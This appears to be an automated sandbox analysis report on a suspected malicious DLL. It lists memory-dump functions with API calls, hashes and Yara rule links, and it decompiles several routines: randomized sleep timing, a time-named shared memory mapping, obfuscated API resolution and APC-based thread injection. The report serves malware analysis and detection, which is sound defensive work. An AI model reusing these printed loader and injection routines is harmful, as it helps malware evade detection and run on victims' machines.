_free.LIBCMT ref: 6E1DD5D1
_free.LIBCMT ref: 6E1DD609
_free.LIBCMT ref: 6E1DD610
_free.LIBCMT ref: 6E1DD62D
_free.LIBCMT ref: 6E1DD645

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: a6ca9a775ce20dd2ec9c2a3eb36a4f1a1bf50207fac878929574819db24c4036
Instruction ID: ed384918be04345ea7fd07833a854b2df2e40a7c4904b23ae768b1ab89107797
Opcode Fuzzy Hash: a6ca9a775ce20dd2ec9c2a3eb36a4f1a1bf50207fac878929574819db24c4036
Instruction Fuzzy Hash: 95314E71608605AFEB618AF8D840B8673F8FF10318F204A1AE069D7151EF75E9C8EF60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D748A, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMON

Download Yara Rule

Strings

, xrefs: 6E1D7712

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: ae12185829043b61ac0ed26651abcf979a4f8d84795e2571f3633da66dbb3b50
Instruction ID: c408524eb839dbce3bacbda85d8342d76dbbf3dc9bc9cca2dc85c5dacf4e751e
Opcode Fuzzy Hash: ae12185829043b61ac0ed26651abcf979a4f8d84795e2571f3633da66dbb3b50
Instruction Fuzzy Hash: C8C114B0A046459FDF01CFECC894BADBBB5AF2A314F10495AE910AB3C1D77099C9DB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E16163F, Relevance: 15.1, APIs: 10, Instructions: 98
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E6E16163F(char _a4) {
				long _v8;
				struct _SYSTEMTIME _v24;
				char _v48;
				void* __edi;
				long _t20;
				int _t22;
				long _t26;
				long _t30;
				intOrPtr _t38;
				intOrPtr _t43;
				signed int _t44;
				void* _t48;
				signed int _t51;
				void* _t54;
				intOrPtr* _t55;

				_t20 = E6E161850();
				_v8 = _t20;
				if(_t20 != 0) {
					return _t20;
				}
				do {
					GetSystemTime( &_v24);
					_t22 = SwitchToThread();
					asm("cdq");
					_t44 = 9;
					_t51 = _t22 + (_v24.wMilliseconds & 0x0000ffff) % _t44;
					_v8 = E6E1618F4(0, _t51);
					Sleep(_t51 << 5);
					_t26 = _v8;
				} while (_t26 == 0xc);
				if(_t26 != 0) {
					L18:
					return _t26;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t54 = E6E1612DC(E6E16135A,  &_v48);
					if(_t54 == 0) {
						_v8 = GetLastError();
					} else {
						_t30 = WaitForSingleObject(_t54, 0xffffffff);
						_v8 = _t30;
						if(_t30 == 0) {
							GetExitCodeThread(_t54,  &_v8);
						}
						CloseHandle(_t54);
					}
					_t26 = _v8;
					if(_t26 == 0xffffffff) {
						_t26 = GetLastError();
					}
					goto L18;
				}
				if(E6E161538(_t44,  &_a4) != 0) {
					 *0x6e164138 = 0;
					goto L11;
				}
				_t43 = _a4;
				_t55 = __imp__GetLongPathNameW;
				_t48 =  *_t55(_t43, 0, 0);
				if(_t48 == 0) {
					L9:
					 *0x6e164138 = _t43;
					goto L11;
				}
				_t14 = _t48 + 2; // 0x2
				_t38 = E6E161DE1(_t48 + _t14);
				 *0x6e164138 = _t38;
				if(_t38 == 0) {
					goto L9;
				}
				 *_t55(_t43, _t38, _t48);
				E6E161DFC(_t43);
				goto L11;
			}

0x6e161646
0x6e16164f
0x6e161652
0x6e161742
0x6e161742
0x6e161659
0x6e16165d
0x6e161663
0x6e161671
0x6e161672
0x6e161675
0x6e161681
0x6e161684
0x6e16168a
0x6e16168d
0x6e161694
0x6e16173f
0x00000000
0x6e16173f
0x6e16169e
0x6e1616ef
0x6e1616ef
0x6e161705
0x6e16170a
0x6e161732
0x6e16170c
0x6e16170f
0x6e161717
0x6e16171a
0x6e161721
0x6e161721
0x6e161728
0x6e161728
0x6e161735
0x6e16173b
0x6e16173d
0x6e16173d
0x00000000
0x6e16173b
0x6e1616ab
0x6e1616e9
0x00000000
0x6e1616e9
0x6e1616ad
0x6e1616b0
0x6e1616bb
0x6e1616bf
0x6e1616e1
0x6e1616e1
0x00000000
0x6e1616e1
0x6e1616c1
0x6e1616c6
0x6e1616cd
0x6e1616d2
0x00000000
0x00000000
0x6e1616d7
0x6e1616da
0x00000000

APIs

Part of subcall function 6E161850: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E16164B,74B063F0), ref: 6E16185F
Part of subcall function 6E161850: GetVersion.KERNEL32 ref: 6E16186E
Part of subcall function 6E161850: GetCurrentProcessId.KERNEL32 ref: 6E161885
Part of subcall function 6E161850: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E16189E

GetSystemTime.KERNEL32(?,00000000,74B063F0), ref: 6E16165D
SwitchToThread.KERNEL32 ref: 6E161663

Part of subcall function 6E1618F4: VirtualAlloc.KERNEL32(00000000,6E16167D,00003000,00000004,?,?,6E16167D,00000000), ref: 6E16194A
Part of subcall function 6E1618F4: memcpy.NTDLL(?,?,6E16167D,?,?,6E16167D,00000000), ref: 6E1619DC
Part of subcall function 6E1618F4: VirtualFree.KERNEL32(?,00000000,00008000,?,?,6E16167D,00000000), ref: 6E1619F7

Sleep.KERNEL32(00000000,00000000), ref: 6E161684
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 6E1616B9
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 6E1616D7
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 6E16170F
GetExitCodeThread.KERNEL32(00000000,?), ref: 6E161721
CloseHandle.KERNEL32(00000000), ref: 6E161728
GetLastError.KERNEL32(?,00000000), ref: 6E161730
GetLastError.KERNEL32 ref: 6E16173D

Memory Dump Source

Source File: 00000003.00000002.510520660.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000003.00000002.510245175.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.511124947.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.511621519.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.511659655.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
String ID:
API String ID: 2280543912-0
Opcode ID: cd5e3699f20078545631e13a15946386aaf53ce0b8124ec2edba23a0c3c6810b
Instruction ID: 3a5ddf104a9721e7eab36ea7c410687a25f59367c94bbdb76d8434a4d1ea70b3
Opcode Fuzzy Hash: cd5e3699f20078545631e13a15946386aaf53ce0b8124ec2edba23a0c3c6810b
Instruction Fuzzy Hash: 1D31E376A04614AFCF40DBE5CC889AF77BDEF86364B214516E918D3140E730DAA9FB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E16102F, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E6E16102F(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6E162100();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6e164150;
				_push(_t15 + 0x6e16505e);
				_push(_t15 + 0x6e165054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6E1620FA();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t34 = CreateFileMappingW(0xffffffff, 0x6e164140, 4, 0, _t18,  &_v60);
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0);
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x6e16102f
0x6e161038
0x6e16103c
0x6e161042
0x6e161047
0x6e16104c
0x6e16104f
0x6e161052
0x6e161057
0x6e161058
0x6e16105b
0x6e161066
0x6e16106d
0x6e161071
0x6e161073
0x6e161074
0x6e161077
0x6e16107c
0x6e161086
0x6e161088
0x6e161088
0x6e1610a2
0x6e1610a6
0x6e1610f6
0x6e1610a8
0x6e1610b1
0x6e1610c7
0x6e1610cf
0x6e1610e1
0x6e1610e5
0x00000000
0x00000000
0x6e1610d1
0x6e1610d4
0x6e1610d9
0x6e1610db
0x6e1610db
0x6e1610bc
0x6e1610be
0x6e1610e7
0x6e1610e8
0x6e1610e8
0x6e1610b1
0x6e1610fe

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 6E16103C
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E161052
_snwprintf.NTDLL ref: 6E161077
CreateFileMappingW.KERNEL32(000000FF,6E164140,00000004,00000000,?,?), ref: 6E16109C
GetLastError.KERNEL32 ref: 6E1610B3
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 6E1610C7
GetLastError.KERNEL32 ref: 6E1610DF
CloseHandle.KERNEL32(00000000), ref: 6E1610E8
GetLastError.KERNEL32 ref: 6E1610F0

Memory Dump Source

Source File: 00000003.00000002.510520660.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000003.00000002.510245175.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.511124947.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.511621519.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.511659655.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: 1bd2b826855c916d4dce7ecc5fb453ca6913ea0b5443c2923f4b96b49c66b763
Instruction ID: 95e8162c9e3d867cb67678e4b8d0fa62587c351551407cb09c2eef8ce286e97f
Opcode Fuzzy Hash: 1bd2b826855c916d4dce7ecc5fb453ca6913ea0b5443c2923f4b96b49c66b763
Instruction Fuzzy Hash: 9C21C472600108BFDF40AFE9CC88EEE77B9EB95354F218025FA19D7140D6309999AB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D0E20, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 285COMMON

Download Yara Rule

APIs

Part of subcall function 6E1CF749: GetLastError.KERNEL32(?,?,?,6E1C1234,?,?,6E183DFB,0000009C,6E183B81,?,?,00000008,6E18353E,00000000,00000000,00000001), ref: 6E1CF74E
Part of subcall function 6E1CF749: SetLastError.KERNEL32(00000000,6E218190,000000FF,?,?,6E1C1234,?,?,6E183DFB,0000009C,6E183B81,?,?,00000008,6E18353E,00000000), ref: 6E1CF7EC

_free.LIBCMT ref: 6E1D112D
_free.LIBCMT ref: 6E1D1146
_free.LIBCMT ref: 6E1D1184
_free.LIBCMT ref: 6E1D118D
_free.LIBCMT ref: 6E1D1199

Strings

C, xrefs: 6E1D0F7C

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: 3ef43774e3321f02ad25e26ae90811ff4ea5fdf0f7966ad4c9e30991d1127023
Instruction ID: ddd3a354dbda9d5acd840038cd448aea3d1637a931d96cd5816d24d6bd7ddb40
Opcode Fuzzy Hash: 3ef43774e3321f02ad25e26ae90811ff4ea5fdf0f7966ad4c9e30991d1127023
Instruction Fuzzy Hash: 56C16C75A0121A9FDB24DFA8C894B9DB7B5FF18304F2045AAD809A7350E731AEC8DF40

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DE2D8, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6E1DDFC3: _free.LIBCMT ref: 6E1DDFE8

_free.LIBCMT ref: 6E1DE326

Part of subcall function 6E1D1BE4: HeapFree.KERNEL32(00000000,00000000,?,6E1C1383,?,?,?,6E1AADF4,?,?,?,6E17CEF2,000000FF), ref: 6E1D1BFA
Part of subcall function 6E1D1BE4: GetLastError.KERNEL32(?,?,6E1C1383,?,?,?,6E1AADF4,?,?,?,6E17CEF2,000000FF,?,?,?,6E1E9B2C), ref: 6E1D1C0C

_free.LIBCMT ref: 6E1DE331
_free.LIBCMT ref: 6E1DE33C
_free.LIBCMT ref: 6E1DE390
_free.LIBCMT ref: 6E1DE39B
_free.LIBCMT ref: 6E1DE3A6
_free.LIBCMT ref: 6E1DE3B1

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 912b46eab0507c6c6ffd1b7527db95e6eb8889e25de1b3c3b0ec4da8d4051ffc
Instruction ID: 8d985f29430bbb847fd5d4d980815587a6152d15b3079a6d425be003bdb9ba02
Opcode Fuzzy Hash: 912b46eab0507c6c6ffd1b7527db95e6eb8889e25de1b3c3b0ec4da8d4051ffc
Instruction Fuzzy Hash: ED115E71A44B04BAD620EBF4CC85FCBB7ECAF0074CF400D16A299A6091EB75B59DAE50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D53C9, Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(6E1C3E83,00000000,?), ref: 6E1D5411
__fassign.LIBCMT ref: 6E1D55F0
__fassign.LIBCMT ref: 6E1D560D
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E1D5655
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E1D5695
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E1D5741

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 002bbcf89a07c0658d6412921047f9380119a87a7ad47a8049404d36c277d61c
Instruction ID: 5e5911a02bd67ebea16ac4180e6ddf3bb91ad46e4180775bd0cf9632d6113777
Opcode Fuzzy Hash: 002bbcf89a07c0658d6412921047f9380119a87a7ad47a8049404d36c277d61c
Instruction Fuzzy Hash: 5BD1A971D00259DFDB11CFE8C8909EDBBB6FF49314F24415AE855BB241E730AA8ADB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E161A0F, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E161A0F(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6E161DE1(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x6e164150 + 0x6e165014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6e164150 + 0x6e165151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6E161DFC(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x6e164150 + 0x6e165161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6e164150 + 0x6e165174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6e164150 + 0x6e165189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6e164150 + 0x6e16519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6E161EB5(_t56, _a12);
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x6e161a1d
0x6e161a21
0x6e161ae2
0x6e161a27
0x6e161a3f
0x6e161a4e
0x6e161a55
0x6e161a59
0x6e161a5c
0x6e161ada
0x6e161adb
0x6e161a5e
0x6e161a6b
0x6e161a6f
0x6e161a72
0x00000000
0x6e161a74
0x6e161a81
0x6e161a85
0x6e161a88
0x00000000
0x6e161a8a
0x6e161a97
0x6e161a9b
0x6e161a9e
0x00000000
0x6e161aa0
0x6e161aad
0x6e161ab1
0x6e161ab4
0x00000000
0x6e161ab6
0x6e161abc
0x6e161ac2
0x6e161ac7
0x6e161ace
0x6e161ad1
0x00000000
0x6e161ad3
0x6e161ad6
0x6e161ad6
0x6e161ad1
0x6e161ab4
0x6e161a9e
0x6e161a88
0x6e161a72
0x6e161a5c
0x6e161af0

APIs

Part of subcall function 6E161DE1: HeapAlloc.KERNEL32(00000000,?,6E161556,00000208,00000000,00000000,?,?,?,6E1616A9,?), ref: 6E161DED

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E161E4D,?,?,?,?,?,00000002,?,6E161401), ref: 6E161A33
GetProcAddress.KERNEL32(00000000,?), ref: 6E161A55
GetProcAddress.KERNEL32(00000000,?), ref: 6E161A6B
GetProcAddress.KERNEL32(00000000,?), ref: 6E161A81
GetProcAddress.KERNEL32(00000000,?), ref: 6E161A97
GetProcAddress.KERNEL32(00000000,?), ref: 6E161AAD

Part of subcall function 6E161EB5: memset.NTDLL ref: 6E161F34

Memory Dump Source

Source File: 00000003.00000002.510520660.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000003.00000002.510245175.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.511124947.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.511621519.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.511659655.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocHandleHeapModulememset
String ID:
API String ID: 426539879-0
Opcode ID: 8020bb1490d507234a70488505d2f11c8240d51dadd74fd87a24f0bd02f39989
Instruction ID: af1b37070379f5ec4f72957c60e5e920ff8f621d447cc6d0910dd354f1ec3f6e
Opcode Fuzzy Hash: 8020bb1490d507234a70488505d2f11c8240d51dadd74fd87a24f0bd02f39989
Instruction Fuzzy Hash: A42160B160070EAFDB91DFE9C854DAA3BFCFF453447118425E459D7211E730E91AABA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E161AFA, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6e164108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6e16410c;
						if( *0x6e16410c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6e164118;
								if( *0x6e164118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6e16410c);
						}
						HeapDestroy( *0x6e164110);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6e164108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0);
						_t41 = _t18;
						 *0x6e164110 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6e164130 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6E1612DC(E6E16111A, E6E1615EE(_a12, 1, 0x6e164118, _t41));
							 *0x6e16410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x6e161afd
0x6e161b09
0x6e161b0b
0x6e161b0e
0x6e161b84
0x6e161b8a
0x6e161b8c
0x6e161b8e
0x6e161b94
0x6e161b96
0x6e161b9b
0x6e161b9e
0x6e161ba9
0x6e161bab
0x00000000
0x00000000
0x6e161bad
0x6e161bb0
0x6e161bb2
0x00000000
0x00000000
0x00000000
0x6e161bb2
0x6e161bba
0x6e161bba
0x6e161bc6
0x6e161bc6
0x6e161b10
0x6e161b11
0x6e161b31
0x6e161b37
0x6e161b39
0x6e161b3e
0x6e161b7a
0x6e161b7a
0x6e161b40
0x6e161b48
0x6e161b4f
0x6e161b59
0x6e161b65
0x6e161b6c
0x6e161b71
0x6e161b76
0x00000000
0x6e161b76
0x6e161b71
0x6e161b3e
0x6e161b11
0x6e161bd3

APIs

InterlockedIncrement.KERNEL32(6E164108), ref: 6E161B1C
HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 6E161B31

Part of subcall function 6E1612DC: CreateThread.KERNEL32 ref: 6E1612F3
Part of subcall function 6E1612DC: QueueUserAPC.KERNEL32(?,00000000,?), ref: 6E161308
Part of subcall function 6E1612DC: GetLastError.KERNEL32(00000000), ref: 6E161313
Part of subcall function 6E1612DC: TerminateThread.KERNEL32(00000000,00000000), ref: 6E16131D
Part of subcall function 6E1612DC: CloseHandle.KERNEL32(00000000), ref: 6E161324
Part of subcall function 6E1612DC: SetLastError.KERNEL32(00000000), ref: 6E16132D

InterlockedDecrement.KERNEL32(6E164108), ref: 6E161B84
SleepEx.KERNEL32(00000064,00000001), ref: 6E161B9E
CloseHandle.KERNEL32 ref: 6E161BBA
HeapDestroy.KERNEL32 ref: 6E161BC6

Memory Dump Source

Source File: 00000003.00000002.510520660.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000003.00000002.510245175.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.511124947.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.511621519.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.511659655.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: 6749c9981e5194b8ebf9a519ae579101119f1c6f833c4c40b862754a4116d335
Instruction ID: f72f1f4788480c12ed14cc703f51cb125cb8fad8fc0247b7363ce51684700c65
Opcode Fuzzy Hash: 6749c9981e5194b8ebf9a519ae579101119f1c6f833c4c40b862754a4116d335
Instruction Fuzzy Hash: 3E219671700606AFDF809FE9CC9896A7BB4F7767557108429F419D3140E73099AAFB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1612DC, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1612DC(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				long _t11;
				void* _t13;

				_t13 = CreateThread(0, 0, __imp__SleepEx,  *0x6e16414c, 0, _a12);
				if(_t13 != 0 && QueueUserAPC(_v0, _t13, _a4) == 0) {
					_t11 = GetLastError();
					TerminateThread(_t13, _t11);
					CloseHandle(_t13);
					_t13 = 0;
					SetLastError(_t11);
				}
				return _t13;
			}

0x6e1612f9
0x6e1612fd
0x6e161319
0x6e16131d
0x6e161324
0x6e16132b
0x6e16132d
0x6e161333
0x6e161337

APIs

CreateThread.KERNEL32 ref: 6E1612F3
QueueUserAPC.KERNEL32(?,00000000,?), ref: 6E161308
GetLastError.KERNEL32(00000000), ref: 6E161313
TerminateThread.KERNEL32(00000000,00000000), ref: 6E16131D
CloseHandle.KERNEL32(00000000), ref: 6E161324
SetLastError.KERNEL32(00000000), ref: 6E16132D

Memory Dump Source

Source File: 00000003.00000002.510520660.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000003.00000002.510245175.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.511124947.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.511621519.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.511659655.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: 17330f6508ec4bf6c390485a30f0cf5184fbd9c55d5c8b595ba83e02404c9137
Instruction ID: fe8fecd0251f9155c86adf70293d6ad8c747c6e0485e5bf12bdea2df3b5fb166
Opcode Fuzzy Hash: 17330f6508ec4bf6c390485a30f0cf5184fbd9c55d5c8b595ba83e02404c9137
Instruction Fuzzy Hash: 6BF0FE32606A21FBDE925BA08C4CFAEBB69FB9A751F11C404F60591150C731C81AABA5

Uniqueness

Uniqueness Score: -1.00%

Function 6E19F4A3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E19F4AA

Part of subcall function 6E184FEB: _strlen.LIBCMT ref: 6E184FF1

_Getvals.LIBCPMT ref: 6E19F4FC
_Mpunct.LIBCPMT ref: 6E19F537
_Mpunct.LIBCPMT ref: 6E19F551

Strings

$+xv, xrefs: 6E19F55C

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Mpunct$GetvalsH_prolog3_strlen
String ID: $+xv
API String ID: 3541430992-1686923651
Opcode ID: e5a7ec30f302157854eced934e6cab0bb2e5edf71174fbe66b7dff191507c596
Instruction ID: 60107d9ff18ab076fb4958b54da8db144e89a059af177630ca9ac3b84e722bf1
Opcode Fuzzy Hash: e5a7ec30f302157854eced934e6cab0bb2e5edf71174fbe66b7dff191507c596
Instruction Fuzzy Hash: 4C21A3A5504B526FD721CFB4C4907BBBEECBB0C604B14491AE0A9C7A41D734EA81EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E18160C, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E181613
_strlen.LIBCMT ref: 6E181626
__EH_prolog3.LIBCMT ref: 6E181674
_strlen.LIBCMT ref: 6E181688

Strings

cannot use operator[] with a string argument with , xrefs: 6E181680

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: H_prolog3_strlen
String ID: cannot use operator[] with a string argument with
API String ID: 782648989-2766135566
Opcode ID: c3780a6f815228003ee21f270c355b5af82ceb4e7d929662c0912b31f7f31450
Instruction ID: 3848dca7dd5d9c4219c2abf1c031d305effcba53c4caa04298493aed90d804c2
Opcode Fuzzy Hash: c3780a6f815228003ee21f270c355b5af82ceb4e7d929662c0912b31f7f31450
Instruction Fuzzy Hash: 5511A270A002059BDB04DFE8D814AFFBA79AB40754F100A1CE025AA281C7B19AC4ABE5

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DA8CA, Relevance: 7.9, APIs: 5, Instructions: 373timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E1DA94C
_free.LIBCMT ref: 6E1DA970
_free.LIBCMT ref: 6E1DAAFD
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6E1F61D0), ref: 6E1DAB0F
_free.LIBCMT ref: 6E1DACC9

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: _free$InformationTimeZone
String ID:
API String ID: 597776487-0
Opcode ID: 290e5a3127b88addf89ac6a3cca6ab69ef2a59da783f7fe4f35eef7e7b4272ae
Instruction ID: 0c10d7a81cc5c0084ec38bc40a01086d74896ab69673fe2ffa9a7063b90b864c
Opcode Fuzzy Hash: 290e5a3127b88addf89ac6a3cca6ab69ef2a59da783f7fe4f35eef7e7b4272ae
Instruction Fuzzy Hash: DFC16A72904205AFDB14CFF8C850ADEBBBEEF16314F244969D491D7280E7358ACAE750

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D0995, Relevance: 7.7, APIs: 5, Instructions: 186COMMON

Download Yara Rule

APIs

Part of subcall function 6E1D1C1E: RtlAllocateHeap.NTDLL(00000000,?), ref: 6E1D1C50

_free.LIBCMT ref: 6E1D0AA4
_free.LIBCMT ref: 6E1D0ABB
_free.LIBCMT ref: 6E1D0AD8
_free.LIBCMT ref: 6E1D0AF3
_free.LIBCMT ref: 6E1D0B0A

Memory Dump Source

